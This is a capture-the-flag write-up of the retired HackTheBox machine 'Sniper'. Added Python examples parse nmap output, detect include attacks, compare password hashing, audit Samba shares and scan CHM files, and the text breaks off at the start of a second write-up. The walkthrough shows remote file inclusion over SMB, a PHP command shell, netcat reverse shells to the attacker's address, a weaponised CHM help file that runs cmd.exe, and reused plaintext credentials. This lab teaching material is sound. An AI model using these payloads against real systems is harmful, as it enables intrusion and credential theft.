

Hackthebox.eu - Retired - Sniper

Recon

As always, I start with a simple up/down scan on all TCP ports to see what is open:

# nmap -T4 -p- -oX ./nmapb.xml sniper.htb

Then convert it to HTML to make it pretty:
xsltproc ./nmapb.xml -o nmapb.html


Then rescan the open ports with -A to fingerprint the OS and services:
nmap -T4 -A -p80,135,139,445,49667 sniper.htb -oX ./nmapf.xml

Then convert that to HTML too:
xsltproc ./nmapf.xml -o ./nmapf.html
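The second scan above is built by hand from the ports the first scan found open. As an added example (not from the original post), this script parses nmap's -oX output and produces that follow-up command automatically; the XML below is a constructed sample in nmap's format, the address 192.0.2.10 is a placeholder, and the port list is the one the post rescans.

```python
# Added example (not from the original post): parse nmap's -oX output and
# build the port list for the follow-up "-A" scan.
import xml.etree.ElementTree as ET

# Constructed sample of what "nmap -p- -oX" writes for one host. The open ports
# match the ones the post rescans; everything else is placeholder data.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
      <port protocol="tcp" portid="49667"><state state="open"/><service name="msrpc"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(nmap_xml: str, protocol: str = "tcp") -> list[int]:
    """Return the sorted open port numbers for the given protocol.

    Only ports whose <state> is "open" count; "filtered" and "closed" are skipped.
    """
    root = ET.fromstring(nmap_xml)
    ports = []
    for port in root.iter("port"):
        if port.get("protocol") != protocol:
            continue
        state = port.find("state")
        if state is not None and state.get("state") == "open":
            ports.append(int(port.get("portid")))
    return sorted(ports)


def followup_scan_command(nmap_xml: str, target: str) -> str:
    """Build the service/OS fingerprint scan for just the open ports."""
    ports = ",".join(str(p) for p in open_ports(nmap_xml))
    return f"nmap -T4 -A -p{ports} {target} -oX ./nmapf.xml"


if __name__ == "__main__":
    print(followup_scan_command(SAMPLE_NMAP_XML, "sniper.htb"))
```

Feeding the real nmapb.xml to open_ports() instead of the sample gives the same list the post typed by hand, and the filtered 3306 in the sample shows why the state attribute, not just the presence of a port element, has to be checked.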


Looks like we have a Windows box with IIS on port 80, plus RPC and SMB.

Let's see what we get when browsing the IIS site.
Blog from home page

And this login for "Client Portal"

Tried enrolling a new user with the name admin to check for possible account enumeration...

Nope, it just let me create it, no problem.




No anonymous access on smb

No access on RPC either

Exploit


Alright, so I've poked around.
I think this might be susceptible to RFI.

I found this on the blog post page:

<li><a href="/blog?lang=blog-en.php">English</a></li>

Looks like we can use the "?lang" parameter to call other files, and maybe other sites.

I started up a new tool I found out about today called updog, which is like SimpleHTTPServer:

# updog -d /root/Desktop/HTB/Sniper/ -p 80

And just tried to call my HTML output of nmap.


So I don't see it calling out to my webserver to get the HTML file.

I found this blog that says we might use SMB to get around any filter that might be blocking a call via HTTP.
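The filter the post suspects here is the classic blocklist mistake: rejecting "http://" in the lang parameter does nothing against a UNC path, which PHP on Windows will happily include over SMB. As an added example (not from the original post or the box's own code), the script below shows the allowlist check the include should have used, the naive blocklist it beats, and a detector that flags include-style lang values in IIS W3C log lines. The allowed file names other than blog-en.php, the log field order, and the log lines themselves are constructed; 192.0.2.10 and the 203.0.113.x addresses are placeholders.

```python
# Added example (not from the original post): allowlist vs blocklist for a
# "?lang=" include, plus a detector for remote/traversal include attempts in
# IIS W3C logs. Log lines and the extra language files are constructed.
import re
from typing import Optional
from urllib.parse import unquote

# The only language files the blog ships (blog-en.php is from the post; the
# other two are constructed). Anything else is rejected outright.
ALLOWED_LANGS = {"blog-en.php", "blog-es.php", "blog-fr.php"}


def resolve_lang_file(lang: str) -> Optional[str]:
    """Allowlist: map the lang parameter to a file name, or None if it is not one of ours."""
    return lang if lang in ALLOWED_LANGS else None


def naive_blocklist_allows(lang: str) -> bool:
    """The kind of filter the post suspects: it only rejects HTTP URLs, so a UNC
    path (\\\\host\\share\\file.php) passes. Shown here as the weak 'before'."""
    return not re.search(r"https?://", lang, re.IGNORECASE)


# Values that mean the include points outside the web root: a UNC path, a
# protocol-relative or scheme:// URL, directory traversal, or a NUL byte.
INCLUDE_INDICATORS = re.compile(
    r"(?:^\\\\|^//|[a-z][a-z0-9+.-]*://|\.\./|\.\.\\|%00)", re.IGNORECASE
)

# Constructed IIS W3C log excerpt. Field order is the #Fields line below.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-04-11 22:45:36 192.0.2.10 GET /blog lang=blog-en.php 80 - 203.0.113.5 Mozilla/5.0 200
2019-04-11 22:46:02 192.0.2.10 GET /blog lang=http://203.0.113.7/x.php 80 - 203.0.113.7 Mozilla/5.0 200
2019-04-11 22:47:15 192.0.2.10 GET /blog lang=%5C%5C203.0.113.7%5Cica%5Crs.php 80 - 203.0.113.7 Mozilla/5.0 200
2019-04-11 22:48:40 192.0.2.10 GET /blog lang=../../windows/win.ini 80 - 203.0.113.9 Mozilla/5.0 500
"""


def suspicious_lang_values(log_lines):
    """Return (client_ip, decoded lang value) for each request whose lang= looks
    like a remote or traversal include. Assumes the constructed field order above."""
    hits = []
    for line in log_lines:
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        if len(fields) < 9:
            continue
        query, client_ip = fields[5], fields[8]
        m = re.search(r"(?:^|&)lang=([^&]*)", query)
        if not m:
            continue
        value = unquote(m.group(1))  # IIS logs the query as sent; decode %5C etc.
        if INCLUDE_INDICATORS.search(value):
            hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_lang_values(SAMPLE_IIS_LOG.splitlines()):
        print(f"{ip} -> lang={value!r}")
```

The third sample line is the SMB variant: it sails past naive_blocklist_allows() but is caught both by the allowlist (it is simply not a known file) and by the log detector (it starts with two backslashes once decoded).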


So I started up an SMB server:
python /opt/impacket-master/examples/smbserver.py SHARE /root/Desktop/HTB/Sniper/ -smb2support

I added this from the blog to my /etc/samba/smbd.conf

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

And changed my browser to point to

I get this error message, but I do see

An SMB connection from sniper.htb to my smbserver

I fought with this for a while, but the SMB connection using impacket's smbserver.py kept closing and the PHP files weren't loading. So I followed what was in the blog and used the Samba server in Kali. I also moved over to the newest Kali OS at this point.

I eventually got the PHP in the blog to open and let me poke around a bit


I found this interesting file under the /user folder:

Db.php

Looks like a user/pass

So username: dbuser 
Password: 36mEAhz/B8xQ~2VM
Dbname: sniper

Playing around trying to get a better shell

I did get a POC for a pingback

My PHP code

<?php  shell_exec('ping 10.10.14.48');?>

Saved as rs.php


Does indeed get pingback from the server


This gets a ping back with either exec() or shell_exec().

I found a much better php shell

I stuck this in my /var/www/html/pub share




So much cleaner, and the cmd actually works.



So we have a user named chris.

But we have no write access to the box at all, nowhere to store our PowerShell scripts or netcat to get a reverse shell.

However, we do still have our SMB share.

I moved nc.exe to my SMB share and then, on the PHP shell:

Net use X: \\10.10.14.48\ica

We can see it mapped the drive as X

Now we should be able to use netcat to get our reverse shell


Make sure we are listening on our Kali box

Then on the PHP Shell

X:\nc.exe 10.10.14.48 443 -e C:\Windows\System32\cmd.exe


And 


We gotsta shell!!!!!!






Now let's try and get some info out of the DB we saw earlier.

For some reason I couldn't get any response from just the cmd,
so I loaded it up in PowerShell.

Used this string to connect:

./mysql.exe --user=dbuser --password=36mEAhz/B8xQ~2VM  sniper

Since we saw the table was called users earlier, I just did:
Select * From users;


We know from login.php that the password is stored as an MD5 hash:

id      username        email           password                          trn_date
1       superuser       admin@sniper.co 6e573c8b25e9168e0c61895d821a3d57  2019-04-11 22:45:36

Popped that into an online hash lookup.


So user: superuser
Password: $uperpassw0rd
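The "online hash decrypter" worked because an unsalted MD5 of a password is the same for every site that ever hashed that password, so one precomputed table answers all of them. As an added example (not from the original post or the box's login.php), the script below builds that lookup in miniature and contrasts it with a salted, memory-hard hash that has no shared table to look up. The wordlist and password are constructed; the post's real hash is deliberately not reproduced.

```python
# Added example (not from the original post): unsalted MD5 lookup vs a
# salted scrypt hash. Wordlist and passwords are constructed.
import hashlib
import hmac
import os

# Constructed wordlist standing in for the dictionary behind a hash lookup site.
SAMPLE_WORDLIST = ["password", "letmein", "constructed-example-pw", "summer2019"]


def md5_hex(password: str) -> str:
    """What login.php-style code stores: md5 of the bare password, no salt."""
    return hashlib.md5(password.encode()).hexdigest()


def lookup_md5(digest: str, wordlist):
    """The hash 'decrypter' in miniature: a precomputed md5 -> word table.

    Nothing is reversed; the digest is simply matched against hashes of guesses,
    and the same table serves every application that used unsalted MD5.
    """
    table = {md5_hex(word): word for word in wordlist}
    return table.get(digest.lower())


# scrypt parameters: N=2^14, r=8, p=1 (about 16 MiB of work per guess).
_SCRYPT_N, _SCRYPT_R, _SCRYPT_P = 2 ** 14, 8, 1


def hash_password(password: str) -> str:
    """Salted scrypt: each stored value carries its own random 16-byte salt, so the
    same password hashes differently per user and no shared lookup table applies."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=_SCRYPT_N, r=_SCRYPT_R, p=_SCRYPT_P)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                            n=_SCRYPT_N, r=_SCRYPT_R, p=_SCRYPT_P)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    weak = md5_hex("letmein")
    print("md5 lookup:", weak, "->", lookup_md5(weak, SAMPLE_WORDLIST))
    strong = hash_password("letmein")
    print("scrypt stored:", strong)
    print("verify:", verify_password("letmein", strong))
```

The defensive point for an application like this one is in verify_password(): the salt travels with the hash, so a leaked users table gives an attacker per-row work instead of a single table lookup, and the scrypt cost makes each guess expensive.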


I tried getting some escalation with this account but couldn't get anything.

But what about the dbuser password?  36mEAhz/B8xQ~2VM

I wonder if maybe that might be the password for the chris account.

I tried to connect to the SMB share on sniper using chris and that password.


Yup password reuse FTW!!!

This took me forever to find the commands and get the syntax right for this next part

Basically we are going to use PowerShell to save the credentials and then call a new netcat connection to our attacking box:

powershell
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command  -Credential $credential -Computer localhost -ScriptBlock {\\10.10.14.48\ica\nc.exe 10.10.14.48 55555 -e C:\windows\system32\cmd.exe}


Connected!

Let's get that user hash

type user.txt
21f************************************


Looking around I found a directory under C:\ named Docs

It contains a TXT and a nice note from the CEO

I also found an instructions.chm under the downloads folder.

What is a CHM file, you ask?

Basically a help file that is really just some compiled HTML pages.

Cool, how do you read a CHM file from the command line?

You can use hh.exe, which is included with Windows.... How nice of them.


Here is the output of the decompiled file:

>hh.exe -decompile output instructions.chm

C:\temp\output>type a.html
type a.html
<html>
<body>
<h1>Sniper Android App Documentation</h1>

<h2>Table of Contents</h2>

<p>Pff... This dumb CEO always makes me do all the shitty work. SMH!</p>
<p>I'm never completing this thing. Gonna leave this place next week. Hope someone snipes him.</p>
</body>
</html>


But what might be more interesting than that is that you can open web pages with hh.exe also, since it is essentially just reading HTML files….

And you might be able to use HH.exe to bypass AV if they don't scan what it opens...


I wanted to get the instructions.chm to my Samba share, so I had to make some changes to the config file and restart the service.

I added:

[ica]
path = /var/www/html/pub
public = yes
browseable = yes
create mask = 0777
read only = no
directory mode = 0777
force user = root

Then restarted the service:

service smbd restart
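The two [ica] definitions in this post (the read-only guest share used for the include, and the writable one above) are a useful pair for a config audit: the second is exactly the shape that turns a lab share into an anonymous, root-owned drop point if it is ever left on a real network. As an added example (not from the original post), this script parses smb.conf-style share sections and reports those settings; the input is the post's two share definitions reproduced as constructed text, and the Samba synonyms it knows ("public" for "guest ok", "writable" for "read only = no") are standard Samba behaviour.

```python
# Added example (not from the original post): audit Samba share definitions
# for anonymous access, write access, root impersonation and 0777 masks.
import configparser

# The two [ica] share definitions from the post, as constructed input text.
READ_ONLY_SHARE = """
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
"""

WRITABLE_SHARE = """
[ica]
path = /var/www/html/pub
public = yes
browseable = yes
create mask = 0777
read only = no
directory mode = 0777
force user = root
"""


def _truthy(value: str) -> bool:
    """Samba accepts yes/true/1 (and no/false/0) for boolean parameters."""
    return value.strip().lower() in {"yes", "true", "1"}


def audit_smb_shares(conf_text: str) -> dict[str, list[str]]:
    """Return {share_name: [findings]} for each non-[global] section."""
    # smb.conf is INI-like; configparser handles "key = value" with spaces in keys.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    report = {}
    for share in cp.sections():
        if share == "global":
            continue
        s = cp[share]
        findings = []
        # "public" is a synonym for "guest ok"; "writable = yes" equals "read only = no".
        guest = _truthy(s.get("guest ok", s.get("public", "no")))
        writable = _truthy(s.get("writable", "no")) or not _truthy(s.get("read only", "yes"))
        if guest:
            findings.append("guest access enabled (anyone on the network can read it)")
        if writable:
            findings.append("share is writable")
        if guest and writable:
            findings.append("anonymous write access: unauthenticated clients can drop files")
        if s.get("force user", "").strip() == "root":
            findings.append("force user = root: every file operation runs as root")
        for key in ("create mask", "directory mode"):
            if s.get(key, "").strip().endswith("777"):
                findings.append(f"{key} = {s[key].strip()}: world-writable files/directories")
        report[share] = findings
    return report


if __name__ == "__main__":
    for label, text in (("read-only", READ_ONLY_SHARE), ("writable", WRITABLE_SHARE)):
        for share, findings in audit_smb_shares(text).items():
            print(f"[{share}] ({label})")
            for f in findings:
                print("  -", f)
```

Run against a full /etc/samba/smb.conf the same function walks every share; the combination it reports loudest, guest plus writable plus force user = root, is the one to look for first, because it lets any host on the network write files that end up owned by root.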


Now I can copy this file to my samba share


I went ahead and grabbed the txt file from the other directory too.



I found this blog to get this next part going


I modified it at first just to ping back to my kali box

I inserted this into the HTML of a decompiled CHM file I had on my Windows box (it was an NVIDIA CHM), then saved the file as ping.htm:


<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c ping 10.10.14.48'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>



Created a project.hpp

With this inside:

[OPTIONS]

[FILES]
C:\Users\*********\Desktop\chm\ping.htm

Compiled it using:

C:\Users\*********\Desktop\chm\output>"C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp


Copied it over to my Kali box.

Then I copied it into the directory the boss told me to put the documentation in:
C:\docs


And I got a ping back, which I assume happens when the boss opened the chm file to look at my documentation :)
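Because a CHM is just compressed HTML, the same hh.exe -decompile step used earlier to read instructions.chm also gives a defender everything needed to inspect one before it lands in a folder someone auto-opens. As an added example (not from the original post), the scanner below walks decompiled CHM HTML and reports every HTML Help shortcut object (the CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11 shown in the post) together with the program its Item1 parameter would launch and whether a script auto-clicks it. The two sample pages are constructed; the only "command" in them is the post's own ping, with 203.0.113.7 as a placeholder address.

```python
# Added example (not from the original post): flag HTML Help shortcut objects
# in decompiled CHM pages and extract what they would execute.
import re
from html.parser import HTMLParser

# The HTML Help "shortcut" ActiveX control; when clicked it runs Item1's program.
SHORTCUT_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Constructed page modelled on the post's ping.htm (203.0.113.7 is a placeholder).
SAMPLE_SHORTCUT_PAGE = """<html><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c ping 203.0.113.7'>
  <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
  x.Click();
</SCRIPT>
</body></html>"""

# Constructed ordinary help page with no object at all.
SAMPLE_BENIGN_PAGE = """<html><body><h1>Sniper Android App Documentation</h1>
<p>Table of contents goes here.</p></body></html>"""


class _ObjectCollector(HTMLParser):
    """Collect each <object> with its classid and <param> name/value pairs."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lower-cases tag and attribute names
        if tag == "object":
            self._current = {"classid": (a.get("classid") or "").lower(), "params": {}}
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][(a.get("name") or "").lower()] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def scan_chm_html(html_text: str) -> list[dict]:
    """Return one finding per shortcut object configured with Command=ShortCut."""
    collector = _ObjectCollector()
    collector.feed(html_text)
    # Any "<id>.Click()" in a script means the shortcut fires without user action.
    auto_click = bool(re.search(r"\.Click\s*\(", html_text))
    findings = []
    for obj in collector.objects:
        if SHORTCUT_CLSID not in obj["classid"]:
            continue
        params = obj["params"]
        if params.get("command", "").lower() != "shortcut":
            continue
        # Item1 is "window,program,arguments"; the program field is what executes.
        parts = [s.strip() for s in params.get("item1", "").split(",", 2)]
        findings.append({
            "program": parts[1] if len(parts) > 1 else "",
            "arguments": parts[2] if len(parts) > 2 else "",
            "auto_click": auto_click,
        })
    return findings


if __name__ == "__main__":
    for page_name, page in (("shortcut", SAMPLE_SHORTCUT_PAGE), ("benign", SAMPLE_BENIGN_PAGE)):
        print(page_name, scan_chm_html(page))
```

In practice the loop would run over every .htm/.html file that hh.exe -decompile writes out; a finding whose program is cmd.exe, powershell.exe or anything outside the help viewer, combined with auto_click, is the signature of the technique this post uses and is worth blocking before such files reach a folder that gets opened automatically.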

Now we just need to get it to execute something so we can get a shell as our boss once he opens the documentation.


I spent a lot of time here trying to get this shell back, but it seems like even though it executes the chm file as the boss, there isn't actually a session for me to grab hold of here… 


So what about just writing the file out to a place we can read?

I put this line in my HTML file:
  <PARAM name="Item1" value=',cmd.exe, /c type C:\Users\administrator\Desktop\root.txt > C:\temp\root.txt'>
Recompiled my CHM.
Renamed it to Project-type.chm.

Moved it to my SMB


Copied it to C:\docs

After a minute my chm disappeared, as is usual for chm files in the C:\docs directory, which emulates the box reading the documentation and moving it to another location.


Then in the C:\temp folder we created we see our root.txt


Now we can read it !!!!!




I know that technically we could use this to completely take over the box, but it just feels cheap writing out the root.txt to a location we can read.






HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar